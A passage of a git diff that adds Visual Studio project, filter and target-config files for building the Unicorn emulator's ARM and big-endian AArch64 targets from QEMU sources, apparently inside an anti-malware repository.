Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\helper-a64.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h" /> + <ClInclude 
Include="..\..\..\qemu\target-arm\translate.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\aarch64eb.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\cpu64.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\helper-a64.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\translate-a64.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_aarch64.c" /> + <ClCompile 
Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{340D86A5-E53C-490B-880A-8EB1F5BDE947}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>aarch64ebsoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64eb.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + 
<PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64eb.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64eb.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + 
<GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64eb.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/aarch64eb-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/aarch64eb-softmmu.vcxproj.filters new file 
mode 100644 index 0000000..39d22d5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/aarch64eb-softmmu.vcxproj.filters @@ -0,0 +1,149 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{4988fbf5-a5f0-4aaa-b301-8292e3bb6df7}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{ea984014-3856-4951-aa11-ed7d98e7d749}</UniqueIdentifier> + </Filter> + <Filter Include="hw\arm"> + <UniqueIdentifier>{fac9d0b8-8064-4486-bc54-0a63831fae99}</UniqueIdentifier> + </Filter> + <Filter Include="target-arm"> + <UniqueIdentifier>{8bb5cb48-4c00-419c-9ec9-7fa2829dd28e}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{4667e883-fc0e-4fc8-afad-b8f471736a96}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{d2c6525e-91e8-4b37-bd22-c07aa4058f1d}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\helper-a64.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h"> + <Filter>target-arm</Filter> + </ClInclude> + 
<ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + <ClInclude Include="..\..\..\qemu\aarch64eb.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\cpu64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\helper-a64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c"> + 
<Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\translate-a64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_aarch64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/config-target.h new file mode 100644 index 0000000..8baffa3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_AARCH64 1 +#define TARGET_NAME "aarch64eb" +#define TARGET_ARM 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git 
a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/arm-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/arm-softmmu.vcxproj new file mode 100644 index 0000000..cb905f3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/arm-softmmu.vcxproj @@ -0,0 +1,235 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + 
<ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\arm.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_arm.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + 
<ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{F67EB1EA-DCFA-4758-A2AA-4B570BA78036}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>armsoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" 
Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup 
Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>arm.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + 